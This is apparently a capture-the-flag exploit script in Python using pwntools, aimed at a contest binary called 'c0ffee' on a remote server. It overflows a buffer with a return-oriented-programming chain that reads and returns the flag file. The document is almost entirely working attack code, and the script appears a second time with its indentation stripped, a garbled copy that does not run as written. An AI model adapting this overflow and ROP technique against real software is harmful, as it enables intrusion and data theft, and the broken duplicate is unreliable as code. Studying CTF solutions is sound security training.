HarDToBelieve/pwn_coffee.py

## pwn_coffee.py
from pwn import *
import re
import time

bin = ELF('./c0ffee')
data_section = 0x804B060
read_plt = bin.symbols['read']
popret = 0x08048885
poppoppopret = 0x08048d50
readintro = 0x80487B0
returnflag = 0x80489F5
s = None

def getMaximumCups():
    global s
    if s != None:
        return
    s = remote('c0ffee.svattt.org', 31334)
    s.recvuntil('cups> ')
    s.sendline('1928')
    data = s.recvuntil('cups> ')
    matchObj = re.findall(r'\b\d+\b', data)
    if matchObj:
        maxCup = int(matchObj[0])
        if maxCup == 10:
            s.sendline('1')
            return
        else:
            s.close()
            s = None
            time.sleep(0.1)
            getMaximumCups()
    else:
        log.info('Error')

def run(payload):
    for i in range(10):
        s.recvuntil('size> ')
        s.sendline('128')
        s.sendline('a'*128)
        s.recvuntil('>> ')
        s.sendline('b'*8)
        s.recvuntil('> ')
        s.sendline('yes')
    s.recvuntil('size> ')
    s.sendline(str(len(payload)))
    s.sendline(payload)
    s.recvuntil('>> ')
    s.sendline('b'*8)
    s.recvuntil('> ')
    s.sendline('no')
    s.sendline('/home/c0ffee/flag')
    s.recv()
    s.recv()
    return s.recv()

getMaximumCups()
padding = 'a'*20
flagtxt = p32(read_plt) + p32(poppoppopret) + p32(0) + p32(data_section) + p32(len('/home/c0ffee/flag'))
readfile = p32(readintro) + p32(popret) + p32(data_section) + p32(returnflag)
payload = padding + flagtxt + readfile
flag = run(payload).strip('\n')
log.info('Flag: ' + flag)
	from pwn import *
	import re
	import time

	bin = ELF('./c0ffee')
	data_section = 0x804B060
	read_plt = bin.symbols['read']
	popret = 0x08048885
	poppoppopret = 0x08048d50
	readintro = 0x80487B0
	returnflag = 0x80489F5
	s = None

	def getMaximumCups():
	global s
	if s != None:
	return
	s = remote('c0ffee.svattt.org', 31334)
	s.recvuntil('cups> ')
	s.sendline('1928')
	data = s.recvuntil('cups> ')
	matchObj = re.findall(r'\b\d+\b', data)
	if matchObj:
	maxCup = int(matchObj[0])
	if maxCup == 10:
	s.sendline('1')
	return
	else:
	s.close()
	s = None
	time.sleep(0.1)
	getMaximumCups()
	else:
	log.info('Error')

	def run(payload):
	for i in range(10):
	s.recvuntil('size> ')
	s.sendline('128')
	s.sendline('a'*128)
	s.recvuntil('>> ')
	s.sendline('b'*8)
	s.recvuntil('> ')
	s.sendline('yes')
	s.recvuntil('size> ')
	s.sendline(str(len(payload)))
	s.sendline(payload)
	s.recvuntil('>> ')
	s.sendline('b'*8)
	s.recvuntil('> ')
	s.sendline('no')
	s.sendline('/home/c0ffee/flag')
	s.recv()
	s.recv()
	return s.recv()

	getMaximumCups()
	padding = 'a'*20
	flagtxt = p32(read_plt) + p32(poppoppopret) + p32(0) + p32(data_section) + p32(len('/home/c0ffee/flag'))
	readfile = p32(readintro) + p32(popret) + p32(data_section) + p32(returnflag)
	payload = padding + flagtxt + readfile
	flag = run(payload).strip('\n')
	log.info('Flag: ' + flag)